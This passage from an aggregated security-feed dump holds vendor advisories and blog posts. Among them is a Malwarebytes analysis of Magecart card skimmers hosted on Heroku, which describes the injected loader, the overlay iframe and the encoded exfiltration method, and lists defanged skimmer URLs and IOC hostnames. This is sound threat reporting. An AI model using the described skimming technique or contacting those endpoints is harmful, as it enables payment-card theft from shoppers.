Guardian and Flashpoint\u2019s Lance James. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)**_._**\n", "modified": "2019-12-04T22:11:18", "published": "2019-12-04T22:11:18", "id": "THREATPOST:6EE19A47D59980173B7DD35FE52580E2", "href": "https://threatpost.com/smbs-nation-state-actors-apts-targeting/150836/", "type": "threatpost", "title": "ThreatList: 90% SMBs Believe Nation-State Actors Are Targeting Them", "cvss": {"score": 0.0, "vector": "NONE"}}], "schneier": [{"lastseen": "2019-12-05T12:26:36", "bulletinFamily": "blog", "description": "Interesting [story](<https://www.nytimes.com/2019/11/30/us/politics/pennsylvania-voting-machines.html>) of a flawed computer voting machine and a paper ballot available for recount. All ended well, but only because of that paper backup.\n\n> Vote totals in a Northampton County judge's race showed one candidate, Abe Kassis, a Democrat, had just 164 votes out of 55,000 ballots across more than 100 precincts. Some machines reported zero votes for him. In a county with the ability to vote for a straight-party ticket, one candidate's zero votes was a near statistical impossibility. Something had gone quite wrong.\n\nBoing Boing [post](<https://boingboing.net/2019/12/02/the-electronic-votes-said-he-l.html'>).", "modified": "2019-12-05T12:06:57", "published": "2019-12-05T12:06:57", "id": "SCHNEIER:1C2F1631670162418050016701273C8F", "href": "https://www.schneier.com/blog/archives/2019/12/election_machin_2.html", "type": "schneier", "title": "Election Machine Insecurity Story", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2019-12-06T17:26:46", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 856961 (BIG-IP) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM) | 15.x | 15.0.0 - 15.0.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \n\n \n \n14.x | 14.1.0 - 14.1.2 | None \n13.x | 13.1.0 - 13.1.3 | None \n12.x | 12.1.0 - 12.1.5 | None \n11.x | 11.5.2 - 11.6.5 | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \nBIG-IQ Centralized Management | 7.x | 7.0.0 | None | Medium | [6.5](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H>) | Linux Kernel (BaseOS) \n6.x | 6.0.0 - 6.1.0 | None \n5.x | 5.2.0 - 5.4.0 | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can secure access to the BIG-IP system so that only trusted users have access to the system and avoid installing kernel modules whose authenticity are unknown on the BIG-IP system. For more information on securing access to the BIG-IP system, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix and point release matrix](<https://support.f5.com/csp/article/K15113>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2019-12-05T02:55:00", "published": "2019-12-05T02:55:00", "id": "F5:K17269881", "href": "https://support.f5.com/csp/article/K17269881", "title": "Intel MCE vulnerability CVE-2018-12207", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "suse": [{"lastseen": "2019-12-05T03:26:47", "bulletinFamily": "unix", "description": "This update for haproxy to version 2.0.10 fixes the following issues:\n\n HAProxy was updated to 2.0.10\n\n Security issues fixed:\n\n - CVE-2019-18277: Fixed a potential HTTP smuggling in messages with\n transfer-encoding header missing the "chunked" (bsc#1154980).\n - Fixed an improper handling of headers which could have led to injecting\n LFs in H2-to-H1 transfers creating new attack space (bsc#1157712)\n - Fixed an issue where HEADER frames in idle streams are not rejected and\n thus trying to decode them HAPrpxy crashes (bsc#1157714).\n\n Other issue addressed:\n\n - Macro change in the spec file (bsc#1082318)\n\n More information regarding the release at:\n <a rel=\"nofollow\" href=\"http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d\">http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d</a>\n aae20954b3053ce87e\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "modified": "2019-12-05T00:15:11", "published": "2019-12-05T00:15:11", "id": "OPENSUSE-SU-2019:2645-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00019.html", "title": "Security update for haproxy (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cloudfoundry": [{"lastseen": "2019-12-06T03:52:35", "bulletinFamily": "software", "description": "# \n\n## Severity\n\nLow\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 18.04\n\n## Description\n\nIt was discovered that DjVuLibre incorrectly handled certain memory operations. If a user or automated system were tricked into processing a specially crafted DjVu file, a remote attacker could cause applications to hang or crash, resulting in a denial of service, or possibly execute arbitrary code.\n\nCVEs contained in this USN include: CVE-2019-15142, CVE-2019-15143, CVE-2019-15144, CVE-2019-15145, CVE-2019-18804\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is low unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.146.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.146.0 or later.\n\n## References\n\n * [USN-4198-1](<https://usn.ubuntu.com/4198-1>)\n * [CVE-2019-15142](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15142>)\n * [CVE-2019-15143](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15143>)\n * [CVE-2019-15144](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15144>)\n * [CVE-2019-15145](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-15145>)\n * [CVE-2019-18804](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-18804>)\n", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "CFOUNDRY:8A8925C48F7E405F9D6C927A2B352D79", "href": "https://www.cloudfoundry.org/blog/usn-4198-1/", "title": "USN-4198-1: DjVuLibre vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ubuntu": [{"lastseen": "2019-12-05T21:06:43", "bulletinFamily": "unix", "description": "It was discovered that RabbitMQ incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code.", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "USN-4214-1", "href": "https://usn.ubuntu.com/4214-1/", "title": "RabbitMQ vulnerability", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-12-05T21:29:44", "bulletinFamily": "unix", "description": "docker-engine\n[19.03.1-1.0.0]\n- update to 19.03.1\n[19.03-0.0.1]\n- update to 19.03", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "ELSA-2019-4827", "href": "http://linux.oracle.com/errata/ELSA-2019-4827.html", "title": "docker-engine docker-cli security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2019-12-04T16:34:48", "bulletinFamily": "blog", "description": "Criminals love to abuse legitimate services\u2014especially platform-as-a-service (Paas) cloud providers\u2014as they are a popular and reliable hosting commodity used to support both business and consumer ventures.\n\nCase in point, in April 2019 we [documented](<https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/>) a web skimmer served on code repository GitHub. Later on in June, we [observed](<https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/>) a vast campaign where skimming code was injected into Amazon S3 buckets.\n\nThis time, we take a look at a rash of skimmers found on [Heroku](<https://www.heroku.com/>), a container-based, cloud PaaS owned by Salesforce. Threat actors are leveraging the service not only to host their skimmer infrastructure, but also to collect stolen credit card data.\n\nAll instances of abuse found have already been reported to Heroku and taken down. We would like to thank the Salesforce Abuse Operations team for their swift response to our notification.\n\n### Abusing cloud apps for skimming\n\nDevelopers can leverage Heroku to build apps in a variety of languages and deploy them seamlessly at scale.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/heroku_free.png> \"\" )\n\nHeroku has a freemium model, and new users can experiment with the plaform's free web hosting services with certain limitations. The crooked part of the Magecart cabal were registering free accounts with Heroku to host their skimming business.\n\nTheir web skimming app consists of three components:\n\n * The core skimmer that will be injected into compromised merchant sites, responsible for detecting the checkout URL and loading the next component.\n * A rogue iframe that will overlay the standard payment form meant to harvest the victim's credit card data.\n * The exfiltration mechanism for the stolen data that is sent back in encoded format.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/123.png> \"\" )\n\n### iframe trick\n\nCompromised shopping sites are injected with a single line of code that loads the remote piece of JavaScript. Its goal is to monitor the current page and load a second element (a malicious credit card iframe) when the current browser URL contains the Base64 encoded string _Y2hlY2tvdXQ=_ (checkout). \n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/victim_site.png> \"\" )\n\nThe iframe is drawn above the standard payment form and looks identical to it, as the cybercriminals use the same cascading style sheet (CSS) from _portal.apsclicktopay.com/css/build/easypay.min.css_.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/skimmer_iframe.png> \"\" )\n\nFinally, the stolen data is exfiltrated, after which victims will receive an error message instructing them to reload the page. This may be because the form needs to be repopulated properly, without the iframe this time.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/error_.png> \"\" )\n\n### Several Heroku-hosted skimmers found\n\nThis is not the only instance of a credit card skimmer found on Heroku. We identified several others using the same naming convention for their script, all seemingly becoming active within the past week.\n\n> Another one on [@heroku](<https://twitter.com/heroku?ref_src=twsrc%5Etfw>) \n \nhxxps://stark-gorge-44782.herokuapp[.]com/integration.js. Fake form in an iframe. Data goes to hxxps://stark-gorge-44782.herokuapp[.]com/config.php?id= [pic.twitter.com/Xa1F2z1Z1a](<https://t.co/Xa1F2z1Z1a>)\n> \n> -- Denis (@unmaskparasites) [December 2, 2019](<https://twitter.com/unmaskparasites/status/1201625226704015367?ref_src=twsrc%5Etfw>)\n\nIn one case, the threat actors may have forgotten to use obfuscation. The code shows vanilla skimming, looking for specific fields to collect and exfiltrate using the _window.btoa(JSON.stringify(result))_ method.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/clear.png> \"\" )\n\nWe will likely continue to observe web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it.\n\nFrom a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users. However, in this case we can easily do full qualified domain (FQDN) detections and block just that malicious user.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2019/12/block.png> \"\" )\n\n### Indicators of Compromise (IOCs)\n\n**Skimmer hostnames on Heroku**\n\nancient-savannah-86049[.]herokuapp.com \npure-peak-91770[.]herokuapp[.]com \naqueous-scrubland-51318[.]herokuapp[.]com \nstark-gorge-44782.herokuapp[.]com\n\nThe post [There's an app for that: web skimmers found on PaaS Heroku](<https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2019-12-04T16:00:00", "published": "2019-12-04T16:00:00", "id": "MALWAREBYTES:13BFD465C522350F5BBAF4F876F3913D", "href": "https://blog.malwarebytes.com/web-threats/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku/", "type": "malwarebytes", "title": "There\u2019s an app for that: web skimmers found on PaaS Heroku", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2019-12-04T20:29:37", "bulletinFamily": "blog", "description": "If you're anything like me, you have no interest in physically entering a store the day after Thanksgiving. I do, however, love to shop online in the comfort of my home. While many people start their holiday shopping on Black Friday, I go to my favorite online retailers a day or two early, add what I want to my shopping cart, and then wait for the 20% off discount to hit my email, so I can complete the purchase on my phone. Whether consumers were gift-buying or just waiting for sales, a lot of us were shopping on our phones on Black Friday.\n\n\n\nAs you might imagine, this past weekend was a busy one for Akamai's retail customers and its employees, working all hours of the day and night to ensure peak performance. At the same time, Akamai studies the data from its retail customers from all over the world, examining trends to optimize our solutions. The one trend that jumped out at me was all about mobile. Back in 2018, 57.55% of shoppers during the same period were on mobile devices. This year we saw that number jump to a whopping 62.9%. Here's why I think that is:\n\n * [EVERYONE has a mobile device](<https://www.gsma.com/mobilefordevelopment/wp-content/uploads/2019/07/GSMA-State-of-Mobile-Internet-Connectivity-Report-2019.pdf>). In some parts of the world, it's mobile-first or mobile-only. The US may have started Black Friday, but we've been seeing increases in online shopping all over the world on this shopping holiday.\n * [Loyalty programs make it easy to buy on your phone](<https://www.apptentive.com/blog/2019/06/18/how-major-brands-use-mobile-customer-loyalty-programs/>). If you already have an account, all your information is saved and it's just a few clicks to buy. You might even get free shipping for being loyal.\n * Etailers are getting much better at making mobile shopping easy and fast. [The performance of an online retailer's web site or app has to be exceptional](<https://www.bigcommerce.com/blog/ecommerce-ux/#how-to-stay-ahead-of-user-expectations>) for shopping and purchasing goods. One key to that is optimizing images and videos. I want to see that sweater in every angle, in every color and I want to see that lipstick on a curly-headed brunette. And I want to see it quickly. I am an online consumer and my expectations are very high.\n\nIf you think you can improve your customer engagement by optimizing your online presence, reach out to us. We are happy to help.\n\nBonus: Did you ever wonder about the origins of Black Friday? Our friends at the Telegraph recently published this[ interesting article](<https://www.telegraph.co.uk/black-friday/2019/11/29/black-friday-name-meaning-history-sales-event/>).\n\n_After evaluating the data of consumers for Cyber Monday, we noticed a unique trend with mobile traffic. In 2018, 37% of mobile conversions happened before 3 seconds, in 2019 that percentage increased to 51% before 3 seconds. Before 3 seconds! There is no denying that eTailers are making mobile purchasing easier and faster._\n\n", "modified": "2019-12-04T19:39:29", "published": "2019-12-04T14:30:00", "id": "AKAMAIBLOG:A5EA7E8213C90D7D67BE3E3A03C3244E", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/hz16syTxBQI/black-friday-stays-mobile.html", "type": "akamaiblog", "title": "Black Friday Stays Mobile", "cvss": {"score": 0.0, "vector": "NONE"}}]}
